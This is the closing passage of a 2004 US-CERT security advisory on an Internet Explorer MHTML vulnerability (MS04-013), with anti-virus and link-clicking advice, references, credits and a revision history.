Do not click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels.
Maintain updated anti-virus software
Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page.
Appendix A. Vendor Information
Microsoft Corporation
Please see Microsoft Security Bulletin MS04-013.
Appendix B. References
- Vulnerability Note VU#323070 - <http://www.kb.cert.org/vuls/id/323070>
- US-CERT Computer Virus Resources - <http://www.us-cert.gov//reading_room/virus.html>
- CVE CAN-2004-0380 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380>
- Microsoft Security Bulletin MS04-013 - <http://www.microsoft.com/technet/security/bulletin/ms04-013.mspx>
- Introduction to URL Security Zones - <http://msdn.microsoft.com/workshop/security/szone/overview/overview.asp>
- About Cross-Frame Scripting and Security - <http://msdn.microsoft.com/workshop/author/om/xframe_scripting_security.asp>
- MIME Type Determination in Internet Explorer - <http://msdn.microsoft.com/workshop/networking/moniker/overview/appendix_a.asp>
- URL Monikers - <http://msdn.microsoft.com/workshop/networking/moniker/monikers.asp>
- Asynchronous Pluggable Protocols - <http://msdn.microsoft.com/workshop/networking/pluggable/pluggable.asp>
- Microsoft HTML Help 1.4 SDK - <http://msdn.microsoft.com/library/en-us/htmlhelp/html/vsconHH1Start.asp>
- Microsoft Knowledge Base Article 182569 - <http://support.microsoft.com/default.aspx?scid=182569>
- Microsoft Knowledge Base Article 174360 - <http://support.microsoft.com/default.aspx?scid=174360>
- Microsoft Knowledge Base Article 833633 - <http://support.microsoft.com/default.aspx?scid=833633>
- Windows XP Service Pack 2 Technical Preview - <http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview.mspx>
- AusCERT Update AU-2004.007 - <http://www.auscert.org.au/3990>
This vulnerability was reported by Liu Die Yu. Thanks to http-equiv for additional research and collaboration.
Feedback can be directed to the author: Art Manion.
Revision History
April 8, 2004: Initial release
April 13, 2004: Added patch and vendor information (MS04-013), credited Liu Die Yu, updated vulnerability, impact, and workaround information about MHTML
April 23, 2004: Thanked http-equiv
April 26, 2004: Further modified sample exploit URL to minimize AV detection
Last updated